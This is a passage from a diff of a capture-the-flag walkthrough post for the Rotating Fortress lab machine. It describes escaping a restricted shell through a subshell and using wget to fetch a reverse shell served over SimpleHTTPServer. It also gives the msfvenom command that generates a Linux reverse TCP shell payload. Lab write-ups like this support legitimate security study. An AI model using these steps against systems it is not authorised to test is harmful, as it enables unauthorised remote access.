limbernie/limbernie.github.io/_posts/2018-08-15-rotating-fortress-1.0.1-walkthrough.md

 ![One-Way Shell](/assets/images/posts/rotating-fortress-1.0.1-walkthrough/5796446b.png)

-Zeus' 1-way shell has a weakness—it allows the use of subshell.
-To bypass the restricted 1-way shell, I'm transferring a reverse shell over to `/tmp/rev` with `wget` running in a subshell.
-Over at my machine, I'm hosting a reverse shell (generated with `msfvenom`) with Python **SimpleHTTPServer** module.
+The **ZEUS' 1-WAY SHELL** has a weakness—it allows the use of subshell.
+To bypass the restricted it, I transferred a reverse shell over to `/tmp/rev` with `wget` running in the subshell.
+Over at my machine, I hosted a reverse shell (generated with `msfvenom`) with the Python **SimpleHTTPServer** module.
+Here's what I did.

-On my machine, I use the following `msfvenom` options to generate the reverse shell.
+First, I use the following `msfvenom` options to generate the reverse shell on my machine.

 ```
 # msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.30.128 LPORT=4444 --platform linux -a x64 -f elf -o rev